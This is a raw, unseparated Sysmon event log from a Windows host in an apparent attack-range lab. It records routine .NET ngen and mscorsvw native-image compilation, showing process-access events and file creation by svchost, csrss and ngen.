13:46:24.437{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9130-6005-EB01-00000000A301}3180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:24.359{59A5CD1D-912F-6005-EA01-00000000A301}880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\370-0\Microsoft.VisualBasic.Activities.Compiler.dll2021-01-18 13:46:24.359 11241100x80000000000000006123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:26.968{59A5CD1D-9132-6005-EE01-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13f4-0\Microsoft.VisualBasic.Compatibility.Data.dll2021-01-18 13:46:26.968 10341000x80000000000000006122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:26.656{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9132-6005-EE01-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:26.656{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9132-6005-EE01-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:26.656{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9132-6005-EE01-00000000A301}5108C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:26.593{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9132-6005-ED01-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:26.578{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9132-6005-ED01-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:26.578{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9132-6005-ED01-00000000A301}1196C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:26.484{59A5CD1D-9130-6005-EC01-00000000A301}4772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12a4-0\Microsoft.VisualBasic.Compatibility.dll2021-01-18 13:46:26.484 10341000x80000000000000006169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.937{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-FD01-00000000A301}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.921{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-FD01-00000000A301}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.921{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-FD01-00000000A301}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.765{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-FC01-00000000A301}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.749{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-FC01-00000000A301}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.749{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-FC01-00000000A301}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-FB01-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.687{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-FB01-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.687{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-FB01-00000000A301}2116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.624{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-FA01-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.609{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-FA01-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.609{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-FA01-00000000A301}4824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.562{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9133-6005-F901-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.562{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9133-6005-F901-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:27.562{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9133-6005-F901-00000000A301}4776C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 